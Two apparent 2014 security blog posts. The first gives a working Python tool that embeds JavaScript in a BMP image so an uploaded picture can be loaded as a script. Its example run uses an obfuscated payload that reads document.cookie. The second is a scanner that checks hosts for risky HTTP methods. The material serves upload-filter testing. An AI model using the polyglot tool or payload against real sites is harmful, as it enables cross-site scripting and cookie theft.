Monday, 31 March 2014

BMP INJECTION Python.

It injects a JavaScript payload into a BMP so that the file is still a bitmap on the outside but also parses as a script: the binary header is wrapped in a JavaScript `/* ... */` comment and the payload follows it.
If you need to test whether an upload form accepts a BMP that carries JavaScript — and whether the stored file can later be pulled in with `<script src=...>` — you could use bmpinjection.py (the example run further down calls it bmpinject.py; use whatever name you saved it under). Keep in mind that a successful upload alone is not a finding: browsers typically refuse to execute an image as a script when the server sends `X-Content-Type-Options: nosniff` or otherwise enforces a script Content-Type, so the `run.html` launcher below should be tried against the real serving path, not just a local copy.

 #!/usr/bin/env python2  
 #============================================================================================================#  
 #======= Simply injects a JavaScript Payload into a BMP. ====================================================#  
 #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#  
 #======= Author: marcoramilli.blogspot.com ==================================================================#  
 #======= Version: PoC (don't even think to use it in development env.) ======================================#  
 #======= Disclaimer: ========================================================================================#  
 #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR  
 #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED  
 #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE  
 #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,  
 #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES  
 #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR  
                                 #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)  
                                 #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,  
 #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING  
 #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE  
 #POSSIBILITY OF SUCH DAMAGE.  
 #===========================================================================================================#  
 import argparse
 import binascii
 import os
   
 #---------------------------------------------------------  
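 def _hexify(num):
     """Return ``num`` as big-endian bytes using as few whole bytes as needed.

     The hexadecimal form is left-padded to an even number of digits so that
     it decodes to whole bytes: ``0x41`` -> ``b"A"``, ``0x4142`` -> ``b"AB"``,
     ``0xABC`` -> ``b"\\x0a\\xbc"``, ``0`` -> ``b"\\x00"``.

     Args:
         num: non-negative int.

     Returns:
         bytes, 1 byte for num < 256, 2 bytes for num < 65536, and so on.

     Raises:
         ValueError: if ``num`` is negative (its hex form would carry a "-").

     NOTE(review): the caller drops this into what the BMP header layout in
     ``_generate_and_write_to_file`` treats as a 4-byte field, but it yields
     only 1-3 bytes for any value below 16 MiB, so the fields after it are
     shifted for every realistic payload length.  Left unchanged because the
     rest of the PoC header is laid out around this behaviour.
     """
     if num < 0:
         raise ValueError("cannot hexify a negative number: %r" % (num,))
     digits = "%x" % num
     if len(digits) % 2:
         digits = "0" + digits
     # unhexlify works on both Python 2 and 3; str.decode('hex') was 2-only.
     return binascii.unhexlify(digits)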
   
 #---------------------------------------------------------  
 #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]  
 #;alert(_0xe428[0]);"  
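 def _generate_and_write_to_file(payload, fname):
     """Write a from-scratch BMP/JavaScript polyglot to ``fname``.

     Layout: "BM", then "/*" in the file-size field, which opens a JavaScript
     block comment; the rest of the header and a fake palette sit inside that
     comment; the trailing header bytes "*/=1;" close it.  A JS engine
     therefore reads the file as ``BM=1;`` followed by ``payload``.  The header
     fields carry the author's hand-picked values; whether a given image
     decoder accepts them as a bitmap is not verified here.

     Args:
         payload: JavaScript source as str or bytes (str is UTF-8 encoded).
         fname: output path; overwritten if it exists.

     Returns:
         True (failures raise rather than return).

     Raises:
         IOError/OSError: if ``fname`` cannot be written.

     NOTE(review): ``_hexify(len(payload))`` fills what this layout treats as
     the 4-byte "bitmap header size" slot, but it yields 1-3 bytes for any
     payload under 16 MiB, so every field after it is shifted.  A length whose
     bytes happen to contain 0x2A 0x2F ("*/") would also close the comment
     early.  Both are inherited from the PoC design and left unchanged.
     """
     if not isinstance(payload, bytes):
         payload = payload.encode("utf-8")

     before_size = b"".join([
         b"\x42\x4D",          # "BM" signature
         b"\x2F\x2A\x00\x00",  # file-size field, but encoded as "/*" -> opens the JS comment
         b"\x00\x00\x00\x00",  # reserved
         b"\x00\x00\x00\x00",  # bitmap data offset
     ])
     after_size = b"".join([
         b"\x00\x00\x00\x14",  # width 20 px .. it's up to you
         b"\x00\x00\x00\x14",  # height 20 px .. it's up to you
         b"\x00\x00",          # number of planes
         b"\x00\x00",          # bits per pixel
         b"\x00\x10\x00\x00",  # compression type
         b"\x00\x00\x00\x00",  # image size .. ignored
         b"\x00\x00\x00\x01",  # horizontal resolution
         b"\x00\x00\x00\x01",  # vertical resolution
         b"\x00\x00\x00\x00",  # number of colours
         b"\x00\x00\x00\x00",  # number of important colours
         b"\x00\x00\x00\x80",  # palette entries, to look compliant
         b"\x00\x80\xff\x80",
         b"\x80\x00\xff\x2A",  # last byte is "*" ...
         b"\x2F\x3D\x31\x3B",  # ... "/=1;" closes the comment; JS now sees "BM=1;"
     ])
     # The variable-width length goes into the "bitmap header size" slot.
     header = before_size + _hexify(len(payload)) + after_size

     with open(fname, "wb") as out:
         out.write(header)
         out.write(payload)
     return True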
   
 #---------------------------------------------------------  
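 def _generate_launching_page(f):
     """Write ``run.html`` in the current directory, a page that loads ``f`` twice.

     The page references ``f`` once as an ``<img>`` (to show it still renders
     as a picture) and once as a ``<script src>`` (to show the embedded
     JavaScript runs).  Open it in a browser next to the generated BMP.

     Args:
         f: path or URL of the polyglot BMP, interpolated into both ``src``
            attributes.  Quotes and ampersands are escaped so the file name
            cannot break out of the attribute; nothing else is validated.

     Returns:
         True (failures raise rather than return).

     Raises:
         IOError/OSError: if ``run.html`` cannot be written.
     """
     # Minimal attribute escaping: enough to keep src="..." well-formed.
     safe = f.replace("&", "&amp;").replace('"', "&quot;")
     htmlpage = (
         "<html>\n"
         "<head><title>Opening an image</title> </head>\n"
         "<body>\n"
         '<img src="' + safe + '"/>\n'          # was '"\>' -- a stray backslash in the markup
         '<script src= "' + safe + '"> </script>\n'
         "</body>\n"
         "</html>\n"
     )
     with open("run.html", "wb") as out:
         # Encode explicitly so "wb" works on Python 3 as well as 2.
         out.write(htmlpage.encode("utf-8"))
     return True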
   
 #---------------------------------------------------------  
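 def _inject_into_file(payload, fname):
     """Turn an existing BMP at ``fname`` into a BMP/JavaScript polyglot, in place.

     Three edits are made: every "*/" inside the image is blanked to NUL NUL
     (it would otherwise end the JavaScript comment early), bytes 2-3 are
     overwritten with "/*" (opening the comment right after "BM"), and
     ``\\xFF*/=1;`` plus ``payload`` are appended.  A JS engine then reads the
     file as ``BM=1;`` followed by the payload.

     Args:
         payload: JavaScript source as str or bytes (str is UTF-8 encoded).
         fname: path of an existing BMP; rewritten in place.

     Returns:
         True (failures raise rather than return).

     Raises:
         ValueError: if the file does not start with the "BM" signature.
         IOError/OSError: if the file cannot be read or written.

     Known limitations: blanking "*/" corrupts those pixels, and the file-size
     field no longer matches the file, so strict decoders may reject the
     result.  Bug fixed here: the original called ``bytes.replace`` and
     discarded the return value, so the "*/" neutralisation never happened.
     """
     if not isinstance(payload, bytes):
         payload = payload.encode("utf-8")

     with open(fname, "rb") as src:
         image = src.read()

     if image[:2] != b"BM":
         raise ValueError("%s does not start with the BMP signature 'BM'" % (fname,))

     # bytes are immutable: the replacement has to be assigned back.
     image = image.replace(b"\x2A\x2F", b"\x00\x00")

     polyglot = (
         image[:2]                        # "BM"
         + b"\x2F\x2A"                    # "/*" over the low half of the size field
         + image[4:]                      # rest of header + pixels, now comment body
         + b"\xFF\x2A\x2F\x3D\x31\x3B"    # \xFF */=1;  -> closes the comment
         + payload
     )

     with open(fname, "wb") as dst:
         dst.write(polyglot)
     return True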
   
   
 #---------------------------------------------------------  
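 if __name__ == "__main__":
     # CLI entry point: build a fresh polyglot BMP, or (-i) graft the payload
     # onto an existing one, then drop run.html next to it as a launcher.
     parser = argparse.ArgumentParser()
     parser.add_argument("filename",help="the bmp file name to be generated/or infected")
     parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
     parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
     args = parser.parse_args()
     print("""
 |======================================================================================================|
 | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.     |
 | It is the end user's responsibility to obey all applicable local, state and federal laws.      |
 | Authors assume no liability and are not responsible for any misuse or damage caused by this program |
 |======================================================================================================|
 """)
     if args.inject_to_existing_bmp:
         _inject_into_file(args.js_payload, args.filename)
     else:
         _generate_and_write_to_file(args.js_payload, args.filename)

     _generate_launching_page(args.filename)
     # print() call form: the bare Python 2 statement was a SyntaxError on 3.
     print("[+] Finished!")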
   

 c:\Python27\python.exe bmpinject.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function Msgbox(_0xccb4x3){alert(eval(_0xccb4x3));};Msgbox(_0x9c4c);"  

Thursday, 20 March 2014

Web METHOD CHECK

Sometimes I need to check which HTTP methods many hosts advertise — in particular dangerous ones such as "TRACE", "DELETE", "PUT" and "COPY". The script below sends `OPTIONS /` to each host and greps the `Allow:` header of the reply; remember that this header is self-reported, so a listed method still has to be confirmed by actually sending it, and an unlisted one is not proof that it is disabled.

So, I just make simple python code. :)

Readme:
url.txt : one target per line, in the same directory as the script. Use bare hostnames or IP addresses (no `http://` prefix, port or path), because each line is handed straight to `socket.connect()`; anything else fails to resolve and is reported as a closed port.

  import socket, sys, re
  import ssl
  import string
   
 def main():  
   # Fillter SSL PORT  
   ssl_port = 443  
     
   # Common Port Mode  
   port = ["80"]  
   
   # INTERNAL URL  
   urldata = open("url.txt", "r")    
   
   count = 0  
   
   for i in urldata:  
     count += 1  
     i = i.strip('\n')  
     for j in port:  
       isheader(i, int(j), count, ssl_port)  
   
   urldata.close()  
   print("\r\nFINISH. Thank you")  
     
   
 def savingR(port, num, url, msg):  
   fp_r = open("result_"+str(port)+".txt","a")  
   fp_r.write("["+str(num)+"]"+url+":"+str(port)+"-"+msg+"\r\n")  
   fp_r.flush()  
   fp_r.close()  
   
 def Msgprint(url, port, msg):  
   print("%s(%d): Done [%s]" %(url, port, msg))  
   
 def isheader(url, port, num, ssl_port):  
   
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
   s.settimeout(10)  
   try:  
     if (ssl_port == port):  
       try:  
         s.connect((url, port))  
       except socket.error:  
         msg = "Closed port(ssl)"  
         Msgprint(url, port, msg)  
         s.close()  
         return 0  
         
       s_ssl = socket.ssl(s)  
   
       s_ssl.write('OPTIONS / HTTP/1.0\r\n\r\n')  
       buf = s_ssl.read()  
       s.close()  
   
     else:  
       try:  
         s.connect((url, port))  
       except socket.error:  
         msg = "Closed port"  
         Msgprint(url, port, msg)  
         s.close()  
         return 0  
         
       s.send("OPTIONS / HTTP/1.0\r\n\r\n".encode('utf-8'))  
   
       buf = (s.recv(1024)).decode('utf-8')  
       s.close()  
       
     if not buf:  
       msg = "Not Return from this server"  
       Msgprint(url, port, msg)  
       return 0  
   
     msg = ''.join(re.findall('Allow:.*', buf))  
   
     if (msg == ""):  
       msg = "Nothing"  
         
     if(''.join(re.findall('PUT', msg))) or (''.join(re.findall('COPY', msg))) or (''.join(re.findall('DELETE', msg)) or (''.join(re.findall('TRACE', msg)))):  
       # To save results  
       num = num+1  
       savingR(port, num, url, msg)  
       msg += "] [*FOUND"  
         
     Msgprint(url, port, msg)  
   
   except:  
     msg = "Timeout"  
     Msgprint(url, port, msg)  
     s.close()  
     return 0  
 main()